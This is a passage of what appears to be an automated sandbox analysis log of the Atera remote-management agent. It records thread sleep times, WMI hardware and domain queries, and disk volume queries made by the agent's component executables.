                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -588325s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -588218s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -588106s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -587984s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -587843s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -587715s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -587593s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -587481s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -587375s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -587263s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -587156s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -587046s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -586933s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -586827s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe TID: 504Thread sleep time: -4611686018427385s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe TID: 4856Thread sleep count: 1123 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe TID: 7796Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe TID: 6612Thread sleep time: -1844674407370954s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe TID: 8152Thread sleep count: 161 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe TID: 5568Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe TID: 712Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe TID: 6820Thread sleep count: 809 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe TID: 4256Thread sleep time: -2767011611056431s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe TID: 4256Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe TID: 4256Thread sleep time: -598572s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe TID: 3308Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe TID: 4360Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 5292Thread sleep count: 3610 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 4696Thread sleep time: -8301034833169293s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 4696Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 4136Thread sleep count: 198 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 3776Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 3872Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeFile opened: PhysicalDrive0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select Manufacturer,Model,Product from Win32_BaseBoard
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select Manufacturer,Model,Product from Win32_BaseBoard
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select Manufacturer,Model,Product from Win32_BaseBoard
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : select Manufacturer,SoftwareElementID,ReleaseDate from Win32_BIOS
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select Manufacturer,Model,Product from Win32_BaseBoard
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select Manufacturer,Model,Product from Win32_BaseBoard
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : select Manufacturer,SoftwareElementID,ReleaseDate from Win32_BIOS
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select Manufacturer,Model,Product from Win32_BaseBoard
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select PartOfDomain,Workgroup,Domain FROM Win32_ComputerSystem
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                                Source: C:\Windows\System32\cscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select PartOfDomain,Workgroup,Domain FROM Win32_ComputerSystem
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select MaxClockSpeed from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select MaxClockSpeed from Win32_Processor
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exeLast function: Thread delayed
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exeLast function: Thread delayed
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 90000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 43125
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 43016
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 42907
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 42781
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 42640
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 42515
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 42360
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 42003
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 41584
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 41426
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 41202
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 41094
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 40984
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 40870
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 40762
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 40625
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 40509
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 40383
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 40281
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 40172
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 40063
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 39953
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 39844
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 39735
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 39625
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 39508
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 39375
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 90000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 600000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599890
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599780
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599672
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599561
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599453
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599340
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599227
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599080
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598834
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598605
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598474
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598352
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598241
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598124
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598016
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597906
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597797
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597687
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597571
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597455
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597328
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597219
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597109
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596998
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596891
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596781
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596672
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596562
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596450
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596343
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 600000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 599553
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 599431
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 599328
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 599211
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 599099
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 598970
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 598828
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 598702
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 598592
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 598469
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 598359
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 598238
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 598124
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 598015
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597890
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597758
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597625
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597488
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597371
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597265
